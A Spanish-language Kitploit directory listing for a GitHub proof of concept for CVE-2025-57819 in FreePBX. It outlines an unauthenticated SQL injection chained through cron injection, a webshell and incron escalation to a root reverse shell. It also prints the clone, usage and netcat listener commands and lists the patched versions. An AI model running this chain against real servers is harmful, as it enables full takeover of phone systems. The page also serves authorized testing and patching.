Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-57819-FreePBX-RCE2Root — PoC de cadena completa del CVE-2025-57819 para FreePBX 15, 16 y 17: SQLi no autenticado a RCE y toma de control de root. | Kitploit
Herramientas/GitHubGitHub/ozcanpng/cve-2025-57819-freepbx-rce2root
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingDesarrollo de Payloads
GitHubozcanpng/cve-2025-57819-freepbx-rce2root

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-57819-FreePBX-RCE2Root

PoC de cadena completa del CVE-2025-57819 para FreePBX 15, 16 y 17: SQLi no autenticado a RCE y toma de control de root.

Ver Repositorio
1hace 2 mesesAún no revisado

CVE-2025-57819 — FreePBX SQLi → RCE → Root

PoC de cadena completa para CVE-2025-57819. La inyección SQL basada en errores no autenticada en el módulo endpoint de FreePBX encadena hasta una shell root mediante la inyección de trabajos cron y la escalada de privilegios por incron.

Solo para pruebas autorizadas e investigación. No lo uses contra sistemas que no sean tuyos.


Qué hace

root@kitploit:~
SQLi (EXTRACTVALUE) → INSERT cron job → webshell drop → incron trigger → root shell
  1. Extrae información de la BD mediante inyección basada en errores en /admin/ajax.php
  2. Inyecta un trabajo cron que escribe una webshell PHP en la raíz web
  3. Espera a que se ejecute cron (~60s) y confirma RCE como asterisk
  4. Crea un archivo de disparo incron que ejecuta el hook de fwconsole como root
  5. Captura la reverse shell en tu listener

Instalación

root@kitploit:~
git clone https://github.com/ozcanpng/CVE-2025-57819-FreePBX-RCE2Root
cd CVE-2025-57819-FreePBX-RCE2Root
pip install -r requirements.txt

Uso

root@kitploit:~
python3 CVE-2025-57819.py <target> <lhost> <lport> [--cleanup]

Inicia un listener primero:

root@kitploit:~
nc -lvnp 9999

Luego ejecuta:

root@kitploit:~
python3 CVE-2025-57819.py freepbx.example.com 192.168.1.50 9999

--cleanup elimina la webshell y el trabajo cron después de la explotación.


Afectados

FreePBX con el módulo endpoint instalado. El parámetro brand en /admin/ajax.php se pasa sin sanitizar a una consulta SQL.

FreePBXPatched Version
15.x15.0.66
16.x16.0.89
17.x17.0.3

Referencias

  • Aviso de seguridad de FreePBX GHSA-m42g-xg4c-5f3h
  • NVD — CVE-2025-57819

Autor

ozcanpng — github.com/ozcanpng — ozcanpng.dev

Descargar herramienta